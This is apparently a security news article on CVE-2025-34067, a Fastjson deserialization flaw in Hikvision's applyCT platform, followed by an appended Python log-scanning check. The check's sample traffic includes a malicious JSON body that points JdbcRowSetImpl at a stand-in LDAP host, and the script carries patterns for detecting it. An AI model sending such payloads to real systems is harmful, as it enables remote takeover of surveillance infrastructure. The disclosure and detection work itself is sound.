
Image: PeiQi0
A newly disclosed vulnerability in HIKVISION’s widely deployed security management platform, applyCT (previously known as HikCentral), has put countless surveillance and monitoring infrastructures at risk. Tracked as CVE-2025-34067 with a maximum CVSS v4 severity rating of 10, the flaw allows for unauthenticated remote command execution through a critical deserialization weakness.
HIKVISION applyCT is a centralized platform used by commercial, governmental, and industrial sectors to monitor and control security devices at scale. The platform’s integration with advanced analytics and scalable architecture has made it a popular choice for high-security environments.
But its reliance on a vulnerable version of the Fastjson library in its applyCT component has opened the door to serious exploitation. The vulnerability stems from how JSON payloads are handled in the /bic/ssoService/v1/applyCT endpoint.
“An unauthenticated remote command execution vulnerability exists in the applyCT component of the Hikvision Integrated Security Management Platform due to the use of a vulnerable version of the Fastjson library,” reads the CVE description.
Fastjson, a widely-used Java library for parsing JSON, includes an “auto-type” feature that can load Java classes dynamically. When improperly configured, it allows attackers to submit malicious JSON objects that instantiate arbitrary classes—essentially letting them run whatever code they want on the backend system.
The vulnerability is triggered by sending a specially crafted POST request with a JSON payload that instructs the system to deserialize a Java class—specifically the JdbcRowSetImpl—from a remote LDAP server controlled by the attacker.
Here’s a simplified version of the proof-of-concept payload:
“The malformed payload is sent to the /bic/ssoService/v1/applyCT endpoint using a POST request… By manipulating the datasource parameter to point to an untrusted LDAP server, the attacker can gain control over the server.”
This vulnerability effectively allows remote code execution (RCE) without any need for authentication, meaning attackers could exploit it over the internet if the vulnerable endpoint is exposed.
HIKVISION platforms are often used to manage critical physical security systems, making this not just a cybersecurity issue, but also a physical security concern. Successful exploitation could allow attackers to:
- Hijack surveillance systems
- Manipulate or disable security feeds
- Move laterally within the network
- Launch additional internal attacks
Organizations using HIKVISION applyCT or any HikCentral variants should take immediate action:
- Audit and identify if the system is exposing the /bic/ssoService/v1/applyCT endpoint.
- Update to a patched version of the Fastjson library or apply any security updates provided by HIKVISION.
- Isolate the system from direct internet access if not strictly necessary.
- Monitor for suspicious outbound LDAP traffic.
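As an added example that is not part of the article or of Hikvision's own code: a small Python check a defender could run over proxy or WAF request logs for the applyCT endpoint, flagging any Fastjson autoType (`@type`) directive and, more specifically, the JdbcRowSetImpl-to-LDAP/RMI pattern described above. The request-record fields, the sample bodies and the LDAP host address are constructed for the example.

```python
import json
import re

TARGET_PATH = "/bic/ssoService/v1/applyCT"  # endpoint named in the advisory
AUTOTYPE_KEY = "@type"  # Fastjson's autoType class-directive key
JNDI_SCHEME = re.compile(r"^\s*(ldap|ldaps|rmi)://", re.IGNORECASE)

def _walk(node):
    """Yield every JSON object in a parsed document, depth-first."""
    if isinstance(node, dict):
        yield node
        for value in node.values():
            yield from _walk(value)
    elif isinstance(node, list):
        for value in node:
            yield from _walk(value)

def classify_body(body):
    """Return 'clean', 'unparseable', 'autotype' or 'jndi_rowset' for one request body."""
    try:
        doc = json.loads(body)
    except ValueError:
        return "unparseable"
    verdict = "clean"
    for obj in _walk(doc):
        if AUTOTYPE_KEY not in obj:
            continue
        verdict = "autotype"  # no legitimate input to this endpoint needs autoType
        source = str(obj.get("dataSourceName", ""))
        if str(obj[AUTOTYPE_KEY]).endswith("JdbcRowSetImpl") and JNDI_SCHEME.match(source):
            return "jndi_rowset"  # the JdbcRowSetImpl-to-JNDI pattern the advisory describes
    return verdict

def scan_requests(requests):
    """Return (request id, verdict) for each suspicious POST to the applyCT path."""
    hits = []
    for req in requests:
        if req.get("method") == "POST" and req.get("path") == TARGET_PATH:
            verdict = classify_body(req.get("body", ""))
            if verdict != "clean":
                hits.append((req["id"], verdict))
    return hits

# Constructed sample traffic for the check above, not real captures.
SAMPLE_REQUESTS = [
    {"id": "r1", "method": "POST", "path": TARGET_PATH, "body": '{"username": "ops"}'},
    {"id": "r2", "method": "POST", "path": TARGET_PATH,
     "body": '{"a": {"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://203.0.113.9:1389/x"}}'},
    {"id": "r3", "method": "POST", "path": TARGET_PATH, "body": '{"@type": "java.lang.String"}'},
]
```

Any `autotype` hit on this endpoint is worth a ticket on its own, since the advisory's fix is to remove the vulnerable Fastjson version rather than to tolerate some class directives.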